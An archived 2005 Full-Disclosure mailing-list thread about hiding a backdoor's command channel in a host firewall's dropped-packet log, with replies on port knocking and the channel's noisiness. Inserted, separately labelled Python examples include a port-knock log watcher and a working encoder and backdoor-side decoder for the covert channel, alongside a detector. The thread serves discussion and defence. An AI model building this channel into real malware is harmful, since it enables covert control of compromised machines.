Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?

2005-10-08 Thread Thierry Zoller
Dear Aditya Deshmukh,

AD Aren't these all different versions of portknocking ? All of 
AD them work until someone outside can figure out the pattern of 
AD events - at most I would call this security by obscurity -
Leveraged to real portknocking, i.e. encrypted payloads (time based)
in different SYN, FIN, etc. packets to different ports, you can't
easily get the pattern. Thus it leverages the protection over a
level that can be seen as security through obscurity. That said,
you completely ignore that port 22, if open, is not a security hole
itself. By hiding it you protect yourself from possible threats.

AD Trivial to detect but good enough for some low security
AD requirements
Prove it.

-- 
Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?

2005-10-08 Thread Jurjen Oskam
On Sat, Oct 08, 2005 at 07:20:17AM +0530, Aditya Deshmukh wrote:

> Aren't these all different versions of portknocking ? All of 
> them work until someone outside can figure out the pattern of 
> events - at most I would call this security by obscurity - 
> Trivial to detect but good enough for some low security 
> requirements

The intention of the case you quoted (opening up the SSH port) is to
deter casual portscanners or SSH version scanners. This way, my system
is much less likely to be on a list of hosts running SSH servers. 

After the port is opened up, you get a regular, properly configured,
up-to-date SSH daemon. 

-- 
Jurjen Oskam
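The mechanism Jurjen describes (a request for a secret, non-existent URL shows up as a 404 in the web server log, a watcher reads the log and opens the SSH port to that address), as an added example. This is not Jurjen's own script; the Apache "combined" log format, the knock path /knock-2005, the 10 minute lifetime per knock and the iptables commands are my assumptions, and the commands are returned as strings, never executed here:

```python
"""Opening port 22 for whoever requests a secret, non-existent URL.

Added example, not Jurjen's own script. Assumptions not stated in the
thread: Apache "combined" access log format, the knock path /knock-2005,
a 10 minute lifetime per knock, and the iptables commands below (returned
as strings; nothing is executed by this module).
"""
import re
from datetime import datetime, timedelta, timezone

KNOCK_PATH = "/knock-2005"              # assumption: the shared-secret URL
KNOCK_TTL = timedelta(minutes=10)       # assumption: how long one knock stays valid

# Apache combined format: ip ident user [time] "METHOD path HTTP/x" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) ')


def parse_access_log(lines):
    """Yield a dict per parseable line; the timestamp becomes an aware datetime."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield ev


def knocks(lines):
    """Yield (ip, ts) for requests that hit the exact knock path and got a 404.

    Only the exact path counts, so a scanner's random 404s open nothing, and
    the status must really be 404: if someone later creates that document,
    the knock silently stops working.
    """
    for ev in parse_access_log(lines):
        if ev["method"] == "GET" and ev["path"] == KNOCK_PATH and ev["status"] == "404":
            yield ev["ip"], ev["ts"]


def accept_rule(ip: str) -> str:
    """The rule the watcher would insert for one knocking address."""
    return f"iptables -I INPUT -p tcp -s {ip} --dport 22 -j ACCEPT"


def evaluate_knocks(lines, now):
    """Split knocking addresses into those still inside KNOCK_TTL and those expired.

    Returns (open_ips, expired_ips), both sorted. A real watcher inserts
    accept_rule(ip) for the first group and deletes the rule it inserted
    earlier for the second, so the port does not stay open forever.
    """
    latest = {}
    for ip, ts in knocks(lines):
        if ip not in latest or ts > latest[ip]:
            latest[ip] = ts
    open_ips = sorted(ip for ip, ts in latest.items() if now - ts <= KNOCK_TTL)
    expired = sorted(ip for ip, ts in latest.items() if now - ts > KNOCK_TTL)
    return open_ips, expired


# Constructed sample log lines: one real knock, scanner noise, a near miss
# (trailing slash), a normal 200, and a knock that is already too old.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [08/Oct/2005:07:20:17 +0530] "GET /knock-2005 HTTP/1.1" 404 293 "-" "curl/7.14.0"',
    '198.51.100.7 - - [08/Oct/2005:07:21:02 +0530] "GET /phpmyadmin/ HTTP/1.0" 404 293 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [08/Oct/2005:07:21:03 +0530] "GET /knock-2005/ HTTP/1.0" 404 293 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [08/Oct/2005:07:22:40 +0530] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [08/Oct/2005:06:00:00 +0530] "GET /knock-2005 HTTP/1.1" 404 293 "-" "curl/7.14.0"',
]
NOW = datetime(2005, 10, 8, 7, 25, tzinfo=timezone(timedelta(hours=5, minutes=30)))

if __name__ == "__main__":
    open_ips, expired = evaluate_knocks(SAMPLE_ACCESS_LOG, NOW)
    for ip in open_ips:
        print(accept_rule(ip))   # iptables -I INPUT -p tcp -s 203.0.113.5 --dport 22 -j ACCEPT
    print("expired:", expired)   # expired: ['192.0.2.44']
```

The knock is a cleartext GET for a fixed path, so anyone who can observe the wire can replay it; that is consistent with what Jurjen says the scheme is for (keeping the host off scanner lists), with the SSH daemon itself still doing the authentication. The lifetime keeps one knock from leaving the port open to that address indefinitely.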


RE: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?

2005-10-07 Thread Aditya Deshmukh
> I myself use this method to open up the SSH port for a particular IP
> address. When you try to open a particular URL on my website, you get a 404
> because that document doesn't exist. The webserver logs this. A script in
> the background sees in the log that this happened, and opens up port 22 to
> the IP address which requested the non-existent URL.

Aren't these all different versions of portknocking ? All of 
them work until someone outside can figure out the pattern of 
events - at most I would call this security by obscurity - 
Trivial to detect but good enough for some low security 
requirements




Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?

2005-10-06 Thread phased
Bit noisy, I think.

-Original Message-
From: PASTOR ADRIAN [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Date: Thu, 6 Oct 2005 10:06:24 +0100
Subject: [Full-disclosure] Interesting idea for a covert channel or I 
just didn't research enough?

> Some time ago I thought of the following idea for a covert channel. Although 
> the idea of covert channels is *not* new at all, I couldn't find anything in 
> Google related to the following method of implementing a covert channel.
> 
> The scenario is the following. The victim is a host with a host-level 
> firewall which is blocking *all* incoming traffic. Somehow the attacker still 
> needs to communicate with a backdoor planted in this host. Use a reverse 
> shell and job done, you might say.
> 
> Actually, there is another way which I thought would be more creative (IMHO). 
> 
> It works like this: the backdoor enables logging in the host-level firewall 
> for all dropped packets, say Windows XP SP2 Firewall. Then the backdoor 
> receives commands from the attacker by interpreting the properties of the 
> dropped packets which were logged by the firewall. In other words, the 
> backdoor is constantly reading the logs and parsing commands which were sent 
> by the attacker embedded in packets which are being dropped (but logged) by 
> the firewall.
> 
> attacker sends packets -> packets are dropped by firewall -> packet 
> properties are captured in logs -> backdoor reads logs and finds encoded 
> commands -> commands are executed 
> 
> Now, the way the backdoor would reply back to the victim is really up to 
> you. One method that comes to my mind is by posting the responses to a PHP 
> script which is located in some free-hosting webpage. The attacker would then 
> access this webpage.
> 
> Please, if you know anything related to backdoors intercepting commands from 
> log files, send me some links. Ideas, comments and flames are more than 
> welcome :-) .
> 
> Regards,
> pagvac (Adrian Pastor)
> Earth, SOLAR SYSTEM
> www.adrianpv.com
> www.ikwt.com (In Knowledge We Trust)
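The chain Adrian describes (attacker sends packets, the firewall drops and logs them, the backdoor parses the log and recovers a command), as an added example that is not code from his post or from anyone in the thread, together with the kind of detector that explains phased's "noisy" remark. My assumptions, not the thread's: the log uses the W3C-style line layout that Windows XP SP2's pfirewall.log writes, channel packets carry a fixed source port (4444), and each command byte rides in the destination port of one dropped SYN:

```python
"""Covert command channel through a host firewall's dropped-packet log.

Added example, not code from the original post. Assumptions that are mine:
the W3C-style line layout of Windows XP SP2's pfirewall.log, a fixed source
port (4444) marking channel packets, and one command byte per SYN encoded
in the destination port. The firewall, the attacker and the backdoor are
all modelled here so the whole path runs offline on constructed lines.
"""
import random
from collections import defaultdict

MAGIC_SRC_PORT = 4444   # assumption: marks packets that belong to the channel
PORT_BASE = 32768       # dst-port = PORT_BASE + seq*256 + byte, seq in 0..127
TERMINATOR = 0x0A       # a newline byte closes one command frame

# Field order from the "#Fields:" header that XP SP2's pfirewall.log writes.
FIELDS = ("date time action protocol src-ip dst-ip src-port dst-port size "
          "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path").split()
HEADER = ["#Version: 1.5", "#Software: Microsoft Windows Firewall",
          "#Time Format: Local", "#Fields: " + " ".join(FIELDS)]
ATTACKER, VICTIM = "203.0.113.5", "192.0.2.10"   # constructed addresses


def encode_command(cmd: bytes) -> list:
    """Attacker side: one (src_port, dst_port) pair per byte, newline-terminated."""
    payload = cmd + bytes([TERMINATOR])
    if len(payload) > 128:
        raise ValueError("a frame carries at most 128 bytes (seq 0..127)")
    return [(MAGIC_SRC_PORT, PORT_BASE + seq * 256 + b)
            for seq, b in enumerate(payload)]


def drop_log_line(src_ip, dst_ip, src_port, dst_port,
                  ts="2005-10-06 10:06:24", tcpsyn=1234567):
    """Emulate the line the firewall writes when it drops an inbound SYN."""
    return (f"{ts} DROP TCP {src_ip} {dst_ip} {src_port} {dst_port} 48 S "
            f"{tcpsyn} 0 65535 - - - RECEIVE")


def parse_log(lines):
    """Yield one dict per data line, keyed by the #Fields names."""
    for line in lines:
        parts = line.split()
        if not parts or line.startswith("#") or len(parts) != len(FIELDS):
            continue
        yield dict(zip(FIELDS, parts))


def decode_commands(lines) -> list:
    """Backdoor side: rebuild commands from DROP events, tolerating reordering.

    A frame is emitted only once every sequence number up to the terminator
    has been seen, so a packet that is logged late cannot truncate it.
    """
    frames = defaultdict(dict)   # src-ip -> {seq: byte}
    commands = []
    for ev in parse_log(lines):
        if ev["action"] != "DROP" or ev["protocol"] != "TCP":
            continue
        if int(ev["src-port"]) != MAGIC_SRC_PORT:
            continue                       # ordinary scan noise, ignore
        offset = int(ev["dst-port"]) - PORT_BASE
        if offset < 0:
            continue
        seq, byte = divmod(offset, 256)
        frame = frames[ev["src-ip"]]
        frame[seq] = byte
        end = [s for s, b in frame.items() if b == TERMINATOR]
        if end and all(i in frame for i in range(end[0] + 1)):
            data = bytes(frame[i] for i in range(end[0]))
            commands.append((ev["src-ip"], data.decode("ascii", "replace")))
            del frames[ev["src-ip"]]
    return commands


def flag_suspicious_sources(lines, min_events=5, min_ports=5) -> list:
    """Defender side: why the channel is noisy.

    Many DROP events from one (src-ip, src-port) to many distinct destination
    ports look like a port scan, which is what this channel is on the wire.
    The thresholds are illustrative and must be tuned for a real log volume.
    """
    stats = defaultdict(lambda: [0, set()])
    for ev in parse_log(lines):
        if ev["action"] == "DROP":
            key = (ev["src-ip"], ev["src-port"])
            stats[key][0] += 1
            stats[key][1].add(ev["dst-port"])
    return sorted({ip for (ip, _), (n, ports) in stats.items()
                   if n >= min_events and len(ports) >= min_ports})


def build_sample_log(command=b"whoami", seed=1) -> list:
    """Constructed log: the attacker's frame plus one unrelated SSH scan drop,
    shuffled because the log is not guaranteed to be in send order."""
    data = [drop_log_line(ATTACKER, VICTIM, sp, dp)
            for sp, dp in encode_command(command)]
    data.append(drop_log_line("198.51.100.7", VICTIM, 51234, 22))
    random.Random(seed).shuffle(data)
    return HEADER + data


if __name__ == "__main__":
    log = build_sample_log()
    print(decode_commands(log))            # [('203.0.113.5', 'whoami')]
    print(flag_suspicious_sources(log))    # ['203.0.113.5']
```

The encoding spends one dropped SYN per byte, which is the cost of the idea: a short command already looks like a small port sweep from one source port, and the same log the backdoor reads is what a host-based IDS or a log-monitoring script sees. The frame reassembly is there because nothing guarantees the firewall logs packets in the order they were sent.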


RE: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?

2005-10-06 Thread Paul Melson
-Original Message-
> I bring this up because the logs generated by the firewall do not
> necessarily reside only on the device that received the sender's packets.
> With lots of organizations working on centralizing log events so that they
> can correlate findings from different platforms, the ability to control the
> content of portions of log messages (say, for example, the source address
> reported in a syslog message indicating a dropped packet) could provide a
> vector for communicating to highly trusted systems to which one has no
> direct network access.

The problem with this type of hiding-in-plain-sight covert channel is that
it is subject to modification between sender and recipient, in this specific
case making the victim the man in the middle.  An aware victim could quickly
become an attacker.  The malware applications of this are moderately
interesting but the implications of this type of communication model in
espionage are extremely interesting.  All sorts of implications and impacts
(for instance, a double agent might intentionally use this type of
communication because it's easily intercepted and modified).  I would guess
that if there is a book on covert channels for spies out there, this is in
the chapter of things NOT to do.

PaulM

